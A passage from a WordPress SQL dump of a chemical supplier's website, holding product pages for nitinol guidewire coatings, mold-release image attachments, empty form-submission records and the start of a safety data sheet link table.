<li>Non-flammable; Low VOC</li>\n 	<li>High surface adhesion and durability</li>\n 	<li>No Delamination</li>\n 	<li>Passes all ASTM and ISO regulations</li>\n 	<li>Lot-to-lot Consistency</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4170-autosave-v1', '', '', '2017-05-05 19:43:25', '2017-05-05 19:43:25', '', 4170, 'https://www.miller-stephenson.com/4170-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4175, 0, '2017-05-05 23:21:19', '2017-05-05 23:21:19', '', '', '', 'publish', 'closed', 'closed', '', '4175', '', '', '2017-05-05 23:21:19', '2017-05-05 23:21:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/4175/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4176, 3, '2017-05-08 14:41:33', '2017-05-08 14:41:33', '', 'ReleaSys Aerosol Mold Release Agent', '', 'inherit', 'closed', 'closed', '', 'shutterstock_340196684', '', '', '2017-05-08 14:41:57', '2017-05-08 14:41:57', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_340196684.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4177, 3, '2017-05-08 14:42:54', '2017-05-08 14:42:54', '', 'ReleaSys Liquid', '', 'inherit', 'closed', 'closed', '', 'shutterstock_533329570', '', '', '2017-05-08 14:43:20', '2017-05-08 14:43:20', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_533329570.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4178, 3, '2017-05-08 15:00:20', '2017-05-08 15:00:20', '', 'Urethane mold release agent', 'Mold Release agent for Polyurethane', 'inherit', 'closed', 'closed', '', 'shutterstock_523637050', '', '', '2017-05-08 15:01:12', '2017-05-08 15:01:12', '', 310, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_523637050.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4179, 3, '2017-05-08 15:30:47', '2017-05-08 15:30:47', '', 'Rubber Molding Release Agent', '', 'inherit', 'closed', 'closed', '', 'shutterstock_375261412', '', '', '2017-05-08 15:31:31', '2017-05-08 15:31:31', '', 293, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4180, 3, '2017-05-08 15:35:15', '2017-05-08 15:35:15', '', 'PTFE Water-based Release Agents', 'PTFE Release Agent', 'inherit', 'closed', 'closed', '', 'shutterstock_524224879', '', '', '2017-05-08 15:35:53', '2017-05-08 15:35:53', '', 297, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_524224879.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4181, 3, '2017-05-08 15:42:36', '2017-05-08 15:42:36', '', 'Composite Mold Release Agent', 'Urethane mold release', 'inherit', 'closed', 'closed', '', 'shutterstock_259045955-2', '', '', '2017-05-08 15:44:52', '2017-05-08 15:44:52', '', 290, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_259045955.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4182, 0, '2017-05-08 19:29:49', '2017-05-08 19:29:49', '', '', '', 'publish', 'closed', 'closed', '', '4182', '', '', '2017-05-08 19:29:49', '2017-05-08 19:29:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/4182/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4183, 0, '2017-05-08 20:23:05', '2017-05-08 20:23:05', '', '', '', 'publish', 'closed', 'closed', '', '4183', '', '', '2017-05-08 20:23:05', '2017-05-08 20:23:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/4183/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4184, 0, '2017-05-09 05:45:51', '2017-05-09 05:45:51', '', '', '', 'publish', 'closed', 'closed', '', '4184', '', '', '2017-05-09 05:45:51', '2017-05-09 05:45:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4184/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4185, 0, '2017-05-09 13:53:47', '2017-05-09 13:53:47', '', '', '', 'publish', 'closed', 'closed', '', '4185', '', '', '2017-05-09 13:53:47', '2017-05-09 13:53:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/4185/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4186, 3, '2017-05-09 15:36:36', '2017-05-09 15:36:36', '<h2><strong>Water-based, Nitinol Wire Coatings</strong></h2>\r\n<h3>Advanced Chemistry; Optimized Coating for Temperature Sensitive Alloys</h3>\r\nMiller-Stephenson offers a low-temperature variant of their next generation, acid-primer free (Non-Cr(VI)) Medical Coating for coating of temperature sensitives substrates like Nickel-Titanium Alloys, Polyamide, etc.  These Nitinol Wire Coatings are water-based, one coat systems providing the same robust and durable fluoropolymer coating in a lower cure temperature system.  Achieving the same performance standards as our <a href="https://www.miller-stephenson.com/product/ptfe-medical-coatings/">850G-90XX</a> and <a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/">850G-102X</a>, this product was designed for the new generation of low temperature metal alloys and/or high temperature plastics. Our world-class next generation fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires. Its lower hazardous classification and stability at ambient temperature also help with handling, application pot-life, and storage conditions. These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.   In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\r\n<ul>\r\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\r\n 	<li class="Body">Low Bake Cure temperatures (450 - 500 °F)</li>\r\n 	<li class="Body">Unmatched Surface Adhesion</li>\r\n 	<li class="Body">Full Back Intergrated raw material manufacturing; Guarantees 100% consistency lot-to-lot</li>\r\n 	<li class="Body">Substantial safer than Cr(VI) / Acid Primer systems</li>\r\n 	<li class="Body">Stable to all forms of sterilization</li>\r\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\r\n</ul>\r\n<p class="Body"><span class="C-8">Our next generation, acid primer-free, Nitinol Wire coatings are optimized to provide superior adhesion to temperature sensitive metallic alloys.  No other product on the market can match the adhesion characteristics and durability of our coating technology. 850G-100X are <span style="text-decoration: underline;">Next-generation</span> Nitinol Wire Coatings by Chemours™ / Miller-Stephenson™ provides excellent adhesion and corrosion protection on a variety of substrates (Nickel-Titanium alloys and high temperature plastics) while maintaining an extremely low coefficient of friction (high lubricity). These nitinol wire coatings are the path forward for companies who want to stay ahead of the Regulatory restriction of Chromium-6 while enhancing consistency, surface adhesion, and miniizel coefficient of friction   </span></p>\r\n\r\n<h3>Nitinol Wire Coatings - Water-based, Low-Temp Cure, Superior Adhesion and Coefficient of Friction</h3>\r\nThese waterbased coatings are formulated with special blends of fluoroplastics and other high-performance resins to improve toughness and abrasion resistance. Being a one-coat system, our Nitinol wire coatings develops a  thin-film  on the surface of the substrate which stratifies the fluoropolymers to the surface during baking.\r\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s PTFE guidewire coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>\r\n\r\n<h3><span style="text-decoration: underline; font-size: 75%;"><strong>Performance and Facts of Fluoropolymer Medical Coatings:</strong></span></h3>\r\n<ul>\r\n 	<li>No Cr(VI)</li>\r\n 	<li>Water-based</li>\r\n 	<li>One coat system</li>\r\n 	<li>Non-corrosive, non-flammable, low VOC</li>\r\n 	<li>One year shelf life stored at room temperature</li>\r\n 	<li>Comparable low coefficient of friction as PTFE- Cr(VI) based coating</li>\r\n 	<li>Dark Green or variety color as requested</li>\r\n 	<li>Coated Nitinol passed Adhesion test , ASTM-3359</li>\r\n 	<li>Coated Nitinol catheter guidewires passed flexibility / adhesion tests, ISO11070 Annex F wrapping test</li>\r\n 	<li>Coated Nitinol catheter guidewires passed corrosion resistance, ISO11070 Annex B, saline soak test</li>\r\n 	<li>Positive feedback from customer evaluations</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">For further information regarding our Medical coatings please see our article section or click here</a>', '850G-100X Low-Bake Nitinol Coatings', 'Miller-Stephenson offers a low-temperature variant of their next generation, acid-primer free (Non-Cr(VI)) Medical Coating for coating of temperature sensitives substrates like Nickel-Titanium Alloys, Polyamide, etc.  These Nitinol Wire Coatings are water-based, one coat systems providing the same robust and durable fluoropolymer coating in a lower cure temperature system.  Achieving the same performance standards as our 850G-90XX and 850G-102X, this product was designed for the new generation of low temperature metal alloys and/or high temperature plastics.\r\n<ul>\r\n 	<li>Ideal for Temperature sensitive alloys</li>\r\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\r\n 	<li class="Body">Unmatched Surface Adhesion</li>\r\n 	<li class="Body">Waterbased, One-coat formulation</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'nitinol-wire-coatings', '', '', '2017-06-26 00:59:01', '2017-06-26 00:59:01', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=4186', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (4187, 3, '2017-05-09 14:56:25', '2017-05-09 14:56:25', 'Fluoropolymer Medical Coatings for nitinol', 'Nitinol Wire Coatings', 'Medical Wire coating', 'inherit', 'closed', 'closed', '', 'shutterstock_572383276', '', '', '2017-05-09 14:57:22', '2017-05-09 14:57:22', '', 4186, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_572383276.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4188, 3, '2017-06-26 00:57:52', '2017-06-26 00:57:52', '<h2><strong>Water-based, Nitinol Wire Coatings</strong></h2>\n<h3>Advanced Chemistry; Optimized Coating for Temperature Sensitive</h3>\nMiller-Stephenson offers a low-temperature variant of their next generation, acid-primer free (Non-Cr(VI)) Medical Coating for coating of temperature sensitives substrates like Nickel-Titanium Alloys, Polyamide, etc.  These Nitinol Wire Coatings are water-based, one coat systems providing the same robust and durable fluoropolymer coating in a lower cure temperature system.  Achieving the same performance standards as our <a href="https://www.miller-stephenson.com/product/ptfe-medical-coatings/">850G-90XX</a> and <a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/">850G-102X</a>, this product was designed for the new generation of low temperature metal alloys and/or high temperature plastics. Our world-class next generation fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires. Its lower hazardous classification and stability at ambient temperature also help with handling, application pot-life, and storage conditions. These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.   In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\n<ul>\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\n 	<li class="Body">Low Bake Cure temperatures (450 - 500 °F)</li>\n 	<li class="Body">Unmatched Surface Adhesion</li>\n 	<li class="Body">Full Back Intergrated raw material manufacturing; Guarantees 100% consistency lot-to-lot</li>\n 	<li class="Body">Substantial safer than Cr(VI) / Acid Primer systems</li>\n 	<li class="Body">Stable to all forms of sterilization</li>\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\n</ul>\n<p class="Body"><span class="C-8">Our next generation, acid primer-free, Nitinol Wire coatings are optimized to provide superior adhesion to temperature sensitive metallic alloys.  No other product on the market can match the adhesion characteristics and durability of our coating technology. 850G-100X are <span style="text-decoration: underline;">Next-generation</span> Nitinol Wire Coatings by Chemours™ / Miller-Stephenson™ provides excellent adhesion and corrosion protection on a variety of substrates (Nickel-Titanium alloys and high temperature plastics) while maintaining an extremely low coefficient of friction (high lubricity). These nitinol wire coatings are the path forward for companies who want to stay ahead of the Regulatory restriction of Chromium-6 while enhancing consistency, surface adhesion, and miniizel coefficient of friction   </span></p>\nThese waterbased coatings are formulated with special blends of fluoroplastics and other high-performance resins to improve toughness and abrasion resistance. Being a one-coat system, our Nitinol wire coatings develops a  thin-film  on the surface of the substrate which stratifies the fluoropolymers to the surface during baking.\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s PTFE guidewire coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>\n\n<h3><span style="text-decoration: underline; font-size: 75%;"><strong>Performance and Facts of Fluoropolymer Medical Coatings:</strong></span></h3>\n<ul>\n 	<li>No Cr(VI)</li>\n 	<li>Water-based</li>\n 	<li>One coat system</li>\n 	<li>Non-corrosive, non-flammable, low VOC</li>\n 	<li>One year shelf life stored at room temperature</li>\n 	<li>Comparable low coefficient of friction as PTFE- Cr(VI) based coating</li>\n 	<li>Dark Green or variety color as requested</li>\n 	<li>Coated Nitinol passed Adhesion test , ASTM-3359</li>\n 	<li>Coated Nitinol catheter guidewires passed flexibility / adhesion tests, ISO11070 Annex F wrapping test</li>\n 	<li>Coated Nitinol catheter guidewires passed corrosion resistance, ISO11070 Annex B, saline soak test</li>\n 	<li>Positive feedback from customer evaluations</li>\n</ul>\n<a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">For further information regarding our Medical coatings please see our article section or click here</a>', '850G-100X Low-Bake Nitinol Coatings', 'Miller-Stephenson offers a low-temperature variant of their next generation, acid-primer free (Non-Cr(VI)) Medical Coating for coating of temperature sensitives substrates like Nickel-Titanium Alloys, Polyamide, etc.  These Nitinol Wire Coatings are water-based, one coat systems providing the same robust and durable fluoropolymer coating in a lower cure temperature system.  Achieving the same performance standards as our 850G-90XX and 850G-102X, this product was designed for the new generation of low temperature metal alloys and/or high temperature plastics.\n<ul>\n 	<li>Ideal for Temperature sensitive alloys</li>\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\n 	<li class="Body">Unmatched Surface Adhesion</li>\n 	<li class="Body">Waterbased, One-coat formulation</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4186-autosave-v1', '', '', '2017-06-26 00:57:52', '2017-06-26 00:57:52', '', 4186, 'https://www.miller-stephenson.com/4186-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4189, 0, '2017-05-09 18:39:44', '2017-05-09 18:39:44', '', '', '', 'publish', 'closed', 'closed', '', '4189', '', '', '2017-05-09 18:39:45', '2017-05-09 18:39:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4189/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4190, 0, '2017-05-09 23:56:19', '2017-05-09 23:56:19', '', '', '', 'publish', 'closed', 'closed', '', '4190', '', '', '2017-05-09 23:56:20', '2017-05-09 23:56:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/4190/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4191, 0, '2017-05-10 13:27:08', '2017-05-10 13:27:08', '', '', '', 'publish', 'closed', 'closed', '', '4191', '', '', '2017-05-10 13:27:08', '2017-05-10 13:27:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/4191/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4192, 0, '2017-05-10 15:10:33', '2017-05-10 15:10:33', '', '', '', 'publish', 'closed', 'closed', '', '4192', '', '', '2017-05-10 15:10:33', '2017-05-10 15:10:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/4192/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4193, 0, '2017-05-10 18:47:25', '2017-05-10 18:47:25', '', '', '', 'publish', 'closed', 'closed', '', '4193', '', '', '2017-05-10 18:47:25', '2017-05-10 18:47:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/4193/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4194, 0, '2017-05-11 06:32:40', '2017-05-11 06:32:40', '', '', '', 'publish', 'closed', 'closed', '', '4194', '', '', '2017-05-11 06:32:41', '2017-05-11 06:32:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/4194/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4195, 0, '2017-05-11 11:36:20', '2017-05-11 11:36:20', '', '', '', 'publish', 'closed', 'closed', '', '4195', '', '', '2017-05-11 11:36:21', '2017-05-11 11:36:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/4195/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4196, 0, '2017-05-11 11:38:00', '2017-05-11 11:38:00', '', '', '', 'publish', 'closed', 'closed', '', '4196', '', '', '2017-05-11 11:38:01', '2017-05-11 11:38:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/4196/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4197, 0, '2017-05-11 13:41:11', '2017-05-11 13:41:11', '', '', '', 'publish', 'closed', 'closed', '', '4197', '', '', '2017-05-11 13:41:11', '2017-05-11 13:41:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4197/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4198, 0, '2017-05-11 17:12:46', '2017-05-11 17:12:46', '', '', '', 'publish', 'closed', 'closed', '', '4198', '', '', '2017-05-11 17:12:46', '2017-05-11 17:12:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4198/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4199, 0, '2017-05-11 17:20:09', '2017-05-11 17:20:09', '', '', '', 'publish', 'closed', 'closed', '', '4199', '', '', '2017-05-11 17:20:09', '2017-05-11 17:20:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/4199/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4200, 961, '2017-05-11 18:12:04', '2017-05-11 18:12:04', '', '', '', 'publish', 'closed', 'closed', '', '4200', '', '', '2017-05-11 18:12:04', '2017-05-11 18:12:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/4200/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4201, 0, '2017-05-11 20:07:17', '2017-05-11 20:07:17', '', '', '', 'publish', 'closed', 'closed', '', '4201', '', '', '2017-05-11 20:07:18', '2017-05-11 20:07:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/4201/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4202, 0, '2017-05-11 20:59:09', '2017-05-11 20:59:09', '', '', '', 'publish', 'closed', 'closed', '', '4202', '', '', '2017-05-11 20:59:09', '2017-05-11 20:59:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/4202/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4203, 0, '2017-05-11 21:23:36', '2017-05-11 21:23:36', '', '', '', 'publish', 'closed', 'closed', '', '4203', '', '', '2017-05-11 21:23:37', '2017-05-11 21:23:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/4203/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4204, 0, '2017-05-11 23:24:51', '2017-05-11 23:24:51', '', '', '', 'publish', 'closed', 'closed', '', '4204', '', '', '2017-05-11 23:24:51', '2017-05-11 23:24:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4204/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4205, 0, '2017-05-12 05:04:57', '2017-05-12 05:04:57', '', '', '', 'publish', 'closed', 'closed', '', '4205', '', '', '2017-05-12 05:04:58', '2017-05-12 05:04:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/4205/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4206, 0, '2017-05-12 07:46:26', '2017-05-12 07:46:26', '', '', '', 'publish', 'closed', 'closed', '', '4206', '', '', '2017-05-12 07:46:27', '2017-05-12 07:46:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/4206/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4207, 2, '2017-05-12 13:48:56', '2017-05-12 13:48:56', '', '242l-as-17', '', 'inherit', 'closed', 'closed', '', '242l-as-17-2', '', '', '2017-05-12 13:48:56', '2017-05-12 13:48:56', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/242L-AS-17.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4208, 2, '2017-05-12 13:50:11', '2017-05-12 13:50:11', '', '242n-as-17', '', 'inherit', 'closed', 'closed', '', '242n-as-17', '', '', '2017-05-12 13:50:11', '2017-05-12 13:50:11', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/242N-AS-17.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4209, 2, '2017-05-12 13:50:28', '2017-05-12 13:50:28', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 203-743-4447 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/467C.pdf">MS-467C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT523.pdf">AUT 523</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907B.pdf">MS-907 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126HUV.pdf">MS-126HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ERED.pdf">MS-122E RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470C-16.pdf">MS-470C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT1045.pdf">AUT 1045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908A.pdf">MS-908 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/242L-AS-17.pdf">MS-242L-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383A.pdf">MS-383A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SE.pdf">MS-122SE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/02/472C-15.pdf">MS-472C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2045.pdf">AUT 2045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908B.pdf">MS-908 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242N.pdf">MS-242N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383H.pdf">MS-383H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SD.pdf">MS-122SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470S-16.pdf">MS-470S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2245.pdf">AUT 2245</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910A.pdf">MS-910 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/05/242N-AS-17.pdf">MS-242N-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383HUV.pdf">MS-383HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122XD.pdf">MS-122XD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/472S.pdf">MS-472S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143.pdf">143 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910B.pdf">MS-910 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/252.pdf">MS-252</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/132FE.pdf">MS-132FE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/475C.pdf">MS-475C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL10X.pdf">GPL 10X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy48.pdf">HELOXY 48</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a 